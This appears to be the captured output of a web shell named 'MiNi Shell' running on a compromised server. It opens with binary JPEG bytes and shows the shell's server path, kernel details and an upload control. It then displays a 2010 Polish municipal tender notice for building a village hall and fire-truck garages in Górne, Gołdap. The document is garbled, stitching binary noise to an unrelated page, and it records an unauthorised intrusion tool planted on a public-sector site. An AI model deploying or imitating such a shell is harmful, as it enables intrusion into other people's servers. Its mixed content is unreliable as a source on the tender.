JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100126/22884-N-2010.html

<p class="kh_header"><b>Gołdap: Budowa świetlicy w miejscowości Górne z dwoma boksami garażowymi na wozy strażackie</b><br>
<b>Numer ogłoszenia: 22884 - 2010; data zamieszczenia: 26.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gołdap , Plac Zwycięstwa 14, 19-500 Gołdap, woj. warmińsko-mazurskie, tel. 087 6156000, faks 087 6150800.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.goldap.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa świetlicy w miejscowości Górne z dwoma boksami garażowymi na wozy strażackie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa świetlicy w miejscowości Górne z dwoma boksami garażowymi na wozy strażackie posiadającego oznaczenie wg Wspólnego Słownika Zamówień(CPV): 45110000-1 Roboty w zakresie burzenia i rozbiórki obiektów budowlanych;roboty ziemne; 45210000-2 Roboty budowlane w zakresie budynków; 45232210-7 Roboty budowlane w zakresie budowy linii napowietrznych; 45300000-0 Roboty instalacyjne w budynkach; 45310000-3 Roboty instalacyjne elektryczne; 45330000-9 Roboty instalacyjne wodno-kanalizacyjne i sanitarne; 45223300-9 Roboty budowlane w zakresie parkingów. 
Zakres prac obejmuje:
1.1. Roboty rozbiórkowe
Rozebranie istniejącego budynku remizy Ochotniczej Straży Pożarnej. Budynek murowany z dachem jednospadowym pokryty papą. Wywiezienie materiałów z rozbiórki.
1.2. Budowa budynku świetlicy wiejskiej z dwoma boksami garażowymi
Budynek parterowy z poddaszem użytkowym, kryty dachem dwuspadowym. Na parterze znajdą się pomieszczenia garażowe na wozy strażackie, kotłownia oraz zaplecze. Na poddaszu znajdą się pomieszczenia świetlicy wraz z zapleczem. Budynek wyposażony w wewnętrzną instalację wodociągowo-kanalizacyjną, centralnego ogrzewania i elektryczną. Powierzchnia zabudowy wraz z powierzchnią schodów i wjazdu dla niepełnosprawnych 245,81 m2. Powierzchnia całkowita 364,55 m2 a powierzchnia użytkowa 338,68m2. W pomieszczeniu garażowym posadzka żywiczna antypoślizgowa np. posadzka poliuretanowa jednobarwna  gr. 2-3mm.                                                                                                                                                                                                   1.3. Ogrodzenie                                                                                                                                                                     Siatka stalowa powlekana na słupkach z rur stalowych obsadzonych w cokole z bramą stalową dwuskrzydłową szer. 5 m oraz furtką o szer. 1,2 m. Wysokość ogrodzenia, bramy oraz furtki 1,5 m.              
1.4. Chodniki i dojazdy
Roboty ziemne, profilowanie i zagęszczanie, ustawienie obrzeży, ustawienie krawężników, wykonanie podbudowy, ułożenie nawierzchni chodników (do wejścia głównego, pomieszczenia kotłowni oraz pomieszczenia komendanta) dojazdów z kostki betonowej Polbruk  gr. 6 cm i 8 cm. Wykonanie podjazdu dla osób niepełnosprawnych.  
1.5. Przyłącza wod.-kan. oraz lokalna oczyszczalnia ścieków
Przyłącze kanalizacyjne do lokalnej oczyszczalni ścieków z rur kanalizacyjnych PCV śred. 160 mm. Przyłącze wodociągowe z istniejącego wodociągu wiejskiego z rury PE 50 z montażem studni wodomierzowej. Lokalna oczyszczalnia ścieków z typowych elementów wykonanych z polietylenu wysokiej jakości.
1.6. Wyposażenie
Zgodnie z wykazem oraz rysunkami stanowiącymi załącznik do SIWZ.
1.7. Wymagania dodatkowe
a) Wykonawca zapewni obsługę geodezyjną podczas realizacji zadania, m.in. wytyczenie i inwentaryzacja geodezyjna powykonawcza.
b) Wykonawca ustawi dwie tablice informacyjne o współfinansowaniu zadania ze środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 zgodnie z wzorem przekazanym przez Zamawiającego (wymiary tablicy 70x90 cm). 
1.8. Szczegółowy opis przedmiotu zamówienia stanowią załączniki
1. Szczegółowe Specyfikacje Techniczne wykonania i odbioru robót. 
 2. Dokumentacja projektowa.
3. Przedmiar robót.
4. Opis wyposażenia.
Materiały wskazane w dokumentacji i pozostałych dokumentach opisujących przedmiot zamówienia mogą być zastąpione równoważnymi spełniającymi wymagania określonych przepisów i podanych norm.  
Zaleca się, aby Wykonawca odwiedził i zbadał plac budowy oraz jego otoczenie i pozyskał dla siebie na swoją odpowiedzialność i ryzyko wszelkie informacje, które mogą być niezbędne w przygotowaniu oferty oraz przy zawieraniu umowy na wykonanie robót. Koszty takiej wizyty ponosi Wykonawca.   
Wymagany okres gwarancji na wykonane roboty wynosi 36 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.11.00.00-1, 45.23.22.10-7, 45.30.00.00-0, 45.31.00.00-3, 45.33.00.00-9, 45.22.33.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> a) Przystępując do przetargu wykonawca jest zobowiązany do wniesienia wadium 
w wysokości  15 000,00 zł (słownie: piętnaście tysięcy złotych)
Wadium powinno być wniesione najpóźniej w wyznaczonym dniu na składanie ofert tj.: do dnia 16.02.2010 r. do godz. 1100
b) Wadium może być wnoszone w: 
- pieniądzu;
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,                     
  gwarancjach z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b, ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
c) Oryginał dokumentu świadczący o wniesieniu wadium w innej formie niż pieniądz należy złożyć w kasie Urzędu Miejskiego w Gołdapi, I piętro pokój nr 16 do wyznaczonego terminu składania ofert tj. do dnia  16.02.2010 r.            do godz. 1100
d) Wadium wnoszone w formie pieniężnej należy wnieść w formie przelewu na konto Zamawiającego:
PKO BP S.A. O/Ełk 89 1020 4724 0000 3602 0007 6463
W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się chwilę uznania kwoty na rachunku Zamawiającego.
e) Oferta, która nie będzie zabezpieczona akceptowalną formą wadium zostanie przez Zamawiającego wykluczona z dalszego postępowania.
f)Zwrot wadium:                                                                                                                                                                         - niezwłocznie na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert, 
- niezwłocznie wszystkim Wykonawcom po wyborze oferty najkorzystniejszej, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, 
-  niezwłocznie wszystkim Wykonawcom  po unieważnieniu postępowania,
- Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano,    
g) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli:
- Wykonawca, którego oferta została wybrana, odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
- Wykonawca nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
- Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie,
h) Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium po wyborze oferty najkorzystniejszej, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu jego oferta została wybrana jako najkorzystniejsza w terminie przez niego określonym.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą brać udział Wykonawcy,  którzy spełniają następujące warunki:
a) posiadają uprawnienia do wykonywania określonej w przedmiocie zamówienia działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,  
b) posiadają wiedzę i doświadczenie do wykonania zamówienia tj.:                                                                                                                                                                                  -wykonali w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwa zamówienia polegające na budowie/przebudowie/remoncie obiektów kubaturowych np: budynki mieszkalne, budynki szkolne, itp., w których udział robót budowlanych (bez instalacyjnych) wynosił minimum 60%,o wartości nie mniejszej niż 350 000 zł każde,z podaniem ich wartości, przedmiotu oraz daty i miejsca wykonania (wzór stanowi załącznik nr 6 do SIWZ). Do wykazu Wykonawca musi również dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, itp.),                                                                                                                                                                                
c) dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia tj.:
-dysponują osobami posiadającymi uprawnienia do kierowania robotami budowlanymi w specjalności                    konstrukcyjno-budowlanej - kierownik budowy oraz w branży sanitarnej i elektrycznej,  
(UWAGA: zakres uprawnień budowlanych winien być dostosowany do rodzaju, stopnia skomplikowania obiektu i innych wymagań związanych z pełnieniem danej funkcji - zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane)
d) sytuacji ekonomicznej i finansowej tj.:                                                                                                                            -posiadają środki   pieniężne w wysokości minimum 350 000 zł lub zdolność kredytową w tej wysokości.
e) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2.2.   Opis sposobu dokonywania oceny spełnienia warunków wymaganych od wykonawców.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana na podstawie złożonych dokumentów wymaganych w Rozdziale III pkt. 3.1. SIWZ, które są potwierdzeniem wymaganych kryteriów od Wykonawców postawionych w Rozdziale III pkt. 2.1. SIWZ. Ocena dokonana zostanie przez komisję przetargową wg formuły  spełnia - nie spełnia. Nie spełnienie chociażby jednego z warunków skutkować będzie wykluczeniem wykonawcy z ubiegania się o zamówienie publiczne o czym zamawiający zawiadomi niezwłocznie wykluczonego wykonawcy, podając uzasadnienie faktyczne i prawne. Ofertę wykonawcy, który został  wykluczony z postępowania, uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty i oświadczenia potwierdzające spełnienie warunków udziału w postępowaniu:
a) wypełniony formularz ofertowy (załącznik nr 1) 
b) kosztorys ofertowy
c)oświadczenie wykonawcy z art. 22 ust. 1 Ustawy (załącznik nr 2),
d)oświadczenie wykonawcy z art. 24 Ustawy (załącznik nr 3),
e) aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
f) aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego, oraz oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,   
g)  wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  minimum dwóch zamówień polegających na budowie/przebudowie/remoncie obiektów kubaturowych np: budynki mieszkalne, budynki szkolne, itp., w których udział robót budowlanych (bez instalacyjnych) wynosił minimum 60%, o wartości nie mniejszej niż   350 000 zł  każde,  z podaniem ich wartości, przedmiotu oraz daty i miejsca wykonania (wzór stanowi załącznik nr 6  do SIWZ). Do każdej pozycji wykazu należy załączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, itp.), 
h) dokumenty potwierdzające posiadanie uprawnień budowlanych do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej - kierownik budowy oraz w branży sanitarnej i elektrycznej oraz zaświadczenia, wydane przez właściwą izbę samorządu zawodowego, potwierdzające wpis danej osoby na listę członków właściwej izby aktualne na dzień składania oferty,   
i) informacja banku, w którym Wykonawca posiada podstawowy rachunek bankowy, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert na kwotę minimum 350 000,00 zł
j) dokument potwierdzający wniesienie wadium,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.goldap.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Goldapi
Pl. Zwycięstwa 14
19-500 Gołdap, pok. 30.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2010 godzina 11:00, miejsce: Urząd Miejski w Gołdapi
Pl.Zwycięstwa 14
19-500 Gołdap, sekretariat pok. 12A.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com